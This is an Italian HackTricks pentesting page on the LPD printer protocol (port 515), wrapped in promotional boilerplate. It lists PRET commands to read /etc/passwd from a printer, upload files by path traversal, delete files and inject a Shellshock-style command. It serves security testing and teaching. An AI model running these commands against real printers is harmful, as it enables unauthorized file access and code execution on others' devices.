4.2 KiB
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF Controlla i PACCHETTI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR a HackTricks e HackTricks Cloud github repos.
Introduzione al protocollo LPD
Negli anni '80, il protocollo Line Printer Daemon (LPD) è stato sviluppato in Berkeley Unix, che in seguito è stato formalizzato tramite RFC1179. Questo protocollo opera sulla porta 515/tcp, consentendo interazioni tramite il comando lpr
. L'essenza della stampa tramite LPD consiste nell'invio di un file di controllo (per specificare i dettagli del lavoro e dell'utente) insieme a un file di dati (che contiene le informazioni di stampa). Mentre il file di controllo consente la selezione di vari formati di file per il file di dati, la gestione di questi file è determinata dall'implementazione specifica di LPD. Un'implementazione ampiamente riconosciuta per i sistemi simili a Unix è LPRng. In particolare, il protocollo LPD può essere sfruttato per eseguire lavori di stampa PostScript o PJL maligni.
Strumenti per interagire con le stampanti LPD
PRET introduce due strumenti essenziali, lpdprint
e lpdtest
, che offrono un metodo semplice per interagire con le stampanti compatibili con LPD. Questi strumenti consentono una serie di azioni, dalla stampa dei dati alla manipolazione dei file sulla stampante, come il download, l'upload o l'eliminazione:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Per coloro interessati ad esplorare ulteriormente il mondo dell'hacking delle stampanti, è possibile trovare una risorsa completa qui: Hacking Printers.
Shodan
porta 515
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata su HackTricks o scaricare HackTricks in PDF, controlla i PACCHETTI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di esclusive NFT
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai repository GitHub di HackTricks e HackTricks Cloud.